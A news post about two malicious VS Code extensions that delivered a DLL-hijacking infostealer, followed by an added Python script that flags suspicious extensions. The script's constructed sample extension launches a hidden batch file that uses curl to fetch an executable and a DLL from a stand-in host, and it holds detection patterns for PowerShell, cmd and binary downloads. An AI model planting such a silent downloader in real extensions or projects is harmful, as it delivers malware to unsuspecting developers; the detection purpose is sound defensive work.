{"id":3791,"date":"2025-12-10T03:38:30","date_gmt":"2025-12-10T03:38:30","guid":{"rendered":"https:\/\/ft365.org\/index.php\/2025\/12\/10\/malicious-vs-code-extensions-deploy-advanced-infostealer\/"},"modified":"2025-12-10T03:38:30","modified_gmt":"2025-12-10T03:38:30","slug":"malicious-vs-code-extensions-deploy-advanced-infostealer","status":"publish","type":"post","link":"http:\/\/ft365.org\/index.php\/2025\/12\/10\/malicious-vs-code-extensions-deploy-advanced-infostealer\/","title":{"rendered":"Malicious VS Code Extensions Deploy Advanced Infostealer"},"content":{"rendered":"<div id=\"cphContent_pnlArticleBody\" data-layout-id=\"2\" data-edit-folder-name=\"text\" data-index=\"0\">\n<p>A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers.<\/p>\n<p>The extensions, Bitcoin Black and Codo AI, were\u00a0available on the VS Code marketplace and were observed delivering\u00a0a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise.<\/p>\n<p>The malicious tools were detailed in a report published by the Koi Security research team on Monday.<\/p>\n<h2>Two Extensions, One Campaign<\/h2>\n<p>Koi said what\u2019s new about this campaign is the way the attacker packaged the tools.<\/p>\n<p>Bitcoin Black presented itself as a cryptocurrency-themed color scheme, while Codo AI offered a functional coding assistant that integrated ChatGPT and DeepSeek.\u00a0Both, however, executed hidden scripts that downloaded a payload using a bundled version of the Lightshot screenshot tool paired with a malicious DLL.<\/p>\n<p>The researchers found that Bitcoin Black, despite claiming to be only a theme, used activation events and PowerShell execution uncommon for legitimate themes.<\/p>\n<p>Codo AI went further by providing genuine coding features, which helped the attacker avoid suspicion during installation and 
use.<\/p>\n<p><em>Read more on developer tool security: Red Team Tool Developer Shellter Admits \u2018Misuse\u2019 by Adversaries<\/em><\/p>\n<p>Koi said they analyzed multiple versions of the extensions and observed rapid refinement. Version 2.5.0 relied on a complex PowerShell routine that downloaded a password-protected ZIP archive and attempted extraction through several fallback methods.<\/p>\n<p>By version 3.3.0, the attacker had streamlined the delivery chain, switching to a hidden batch script that fetched an executable and DLL directly over HTTP and prevented repeated execution through a marker file.<\/p>\n<p>The infostealer collected a wide range of information, including:<\/p>\n<ul>\n<li>\n<p>Clipboard contents<\/p>\n<\/li>\n<li>\n<p>Installed programs<\/p>\n<\/li>\n<li>\n<p>Running processes<\/p>\n<\/li>\n<li>\n<p>Desktop screenshots<\/p>\n<\/li>\n<li>\n<p>Stored WiFi credentials<\/p>\n<\/li>\n<li>\n<p>Browser session data<\/p>\n<\/li>\n<\/ul>\n<h2>DLL Hijacking and C2 Links<\/h2>\n<p>As mentioned above, the payload used DLL hijacking by pairing a legitimate Lightshot executable with the attacker\u2019s DLL.\u00a0This method allowed the malware to run under the guise of a trusted binary.<\/p>\n<p>Koi Security identified command-and-control (C2) domains designed to receive exfiltrated data, along with a distinct mutex name intended to stop multiple instances from running simultaneously.<\/p>\n<p>The researchers\u00a0attributed both extensions to the same threat actor experimenting with separate lures.\u00a0<\/p>\n<p>\u201cA developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents and browser sessions are being exfiltrated to a remote server,\u201d\u00a0they explained.<\/p>\n<p>\u201cAt the time of writing, Codo AI is still live on the VS Code marketplace. 
The attack surface for developer tools continues to expand, and attackers are paying attention.\u201d<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers. The extensions, Bitcoin Black and Codo AI, were\u00a0available on the VS Code marketplace and were observed delivering\u00a0a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise. The<\/p>\n","protected":false},"author":2,"featured_media":3792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3791","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"featured_image_urls":{"full":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"thumbnail":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a-150x150.jpg",150,150,true],"medium":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"medium_large":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"large":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"1536x1536":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"2048x2048":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-featured":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-large":["http:\/\/
ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-medium":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"crawlomatic_preview_image":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a-146x146.jpg",146,146,true]},"author_info":{"display_name":"henry","author_link":"http:\/\/ft365.org\/index.php\/author\/henry\/"},"category_info":"<a href=\"http:\/\/ft365.org\/index.php\/category\/uncategorized\/\" rel=\"category tag\">Uncategorized<\/a>","tag_info":"Uncategorized","comment_count":"0","_links":{"self":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts\/3791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/comments?post=3791"}],"version-history":[{"count":0,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts\/3791\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/media\/3792"}],"wp:attachment":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/media?parent=3791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/categories?post=3791"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/tags?post=3791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
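The article's most actionable detail is Koi's observation that Bitcoin Black claimed to be only a theme yet declared activation events and executed PowerShell. A VS Code colour theme is purely declarative (a `contributes.themes` entry pointing at a JSON file), so a theme-only manifest that also carries a `main`/`browser` entry point or `activationEvents` is an anomaly worth triaging, and so are extension sources that spawn `cmd.exe`/PowerShell or fetch `.exe`/`.dll`/`.zip` files over HTTP, which is the shape of the 3.3.0 delivery chain described above. The script below is an added example written for this page, not tooling from Koi Security or the article. It assumes the standard per-user extensions directory (`~/.vscode/extensions`, or `%USERPROFILE%\.vscode\extensions` on Windows) and, when that directory is absent, builds two constructed sample extension folders so it runs offline; the indicator regexes, folder names and the `hidden.bat` contents are illustrative assumptions, not the real extensions' code.

```python
"""Static triage of installed VS Code extensions (added example, not Koi Security's tooling).

Two checks drawn from the article's description of Bitcoin Black:
  1. A theme-only manifest (contributes only themes/icon themes) needs no entry point
     ("main"/"browser") and no activationEvents, because a theme is declarative.
  2. Extension sources that spawn shells, call PowerShell/cmd, or fetch .exe/.dll/.zip
     over HTTP deserve a human look.
Indicator patterns and the sample extension folders below are constructed for the demo.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# contributes.* keys a pure theme may declare; anything else means the extension ships code paths.
THEME_KEYS = {"themes", "iconThemes", "productIconThemes"}

# Source indicators (heuristic: many legitimate extensions use child_process, so this is triage, not proof).
SUSPICIOUS_SOURCE = [
    (re.compile(r"child_process|\bexecSync?\b|\bspawn(?:Sync)?\b"), "spawns child processes"),
    (re.compile(r"powershell(?:\.exe)?|cmd(?:\.exe)?\s*/c|\.bat\b", re.I), "invokes PowerShell/cmd"),
    (re.compile(r"https?://[^\s'\"]+\.(?:zip|exe|dll)\b", re.I), "downloads a binary over HTTP"),
]
SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".bat", ".cmd", ".ps1"}


def is_theme_only(manifest: dict) -> bool:
    contributes = manifest.get("contributes") or {}
    return bool(contributes) and set(contributes) <= THEME_KEYS


def triage_extension(ext_dir: Path) -> dict:
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    theme_only = is_theme_only(manifest)
    findings = []
    if theme_only and ("main" in manifest or "browser" in manifest):
        findings.append("theme-only extension declares an entry point")
    if theme_only and manifest.get("activationEvents"):
        findings.append("theme-only extension declares activationEvents")
    for path in sorted(ext_dir.rglob("*")):
        # Skip vendored dependencies: they swamp the output with benign child_process use.
        if "node_modules" in path.parts or path.suffix.lower() not in SOURCE_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for pattern, why in SUSPICIOUS_SOURCE:
            if pattern.search(text):
                findings.append(f"{path.relative_to(ext_dir).as_posix()}: {why}")
    return {"name": manifest.get("name"), "theme_only": theme_only, "findings": findings}


def scan_extensions_root(root: Path) -> list:
    return [triage_extension(d) for d in sorted(Path(root).iterdir()) if (d / "package.json").is_file()]


def default_extensions_root() -> Path:
    # Assumption: the standard per-user install location on Windows, macOS and Linux.
    return Path(os.environ.get("USERPROFILE") or Path.home()) / ".vscode" / "extensions"


def build_sample_root() -> Path:
    """Constructed sample data: one clean theme and one theme shaped like the article's description."""
    root = Path(tempfile.mkdtemp(prefix="vscode-triage-"))
    clean = root / "acme.clean-theme-1.0.0"
    clean.mkdir()
    (clean / "package.json").write_text(json.dumps({
        "name": "clean-theme", "version": "1.0.0",
        "contributes": {"themes": [{"label": "Clean", "uiTheme": "vs-dark", "path": "./themes/clean.json"}]},
    }))
    shady = root / "zzz.crypto-theme-3.3.0"
    shady.mkdir()
    (shady / "package.json").write_text(json.dumps({
        "name": "crypto-theme", "version": "3.3.0",
        "main": "./extension.js", "activationEvents": ["*"],
        "contributes": {"themes": [{"label": "Crypto", "uiTheme": "vs-dark", "path": "./themes/crypto.json"}]},
    }))
    (shady / "extension.js").write_text(
        'const { execSync } = require("child_process");\n'
        'exports.activate = () => execSync("cmd.exe /c start /b hidden.bat", { windowsHide: true });\n'
    )
    (shady / "hidden.bat").write_text(
        "@echo off\r\n"
        'if exist "%TEMP%\\.done" exit /b\r\n'  # marker file: run once, as the 3.3.0 chain did
        'curl -s -o "%TEMP%\\ls.exe" http://example.invalid/ls.exe\r\n'
        'curl -s -o "%TEMP%\\shim.dll" http://example.invalid/shim.dll\r\n'
        'type nul > "%TEMP%\\.done"\r\n'
    )
    return root


if __name__ == "__main__":
    root = default_extensions_root()
    if not root.is_dir():
        root = build_sample_root()
    for result in scan_extensions_root(root):
        flag = "!!" if result["findings"] else "ok"
        print(f"[{flag}] {result['name']} theme_only={result['theme_only']}")
        for finding in result["findings"]:
            print("     -", finding)
```

The manifest check is the precise signal: a theme with an entry point or activation events has no honest reason for either. The source indicators are deliberately noisy and exist to direct a reviewer to the file to read, not to convict an extension on their own; pair them with process-creation telemetry for Code.exe spawning `cmd.exe` or `powershell.exe` if you want a behavioural counterpart.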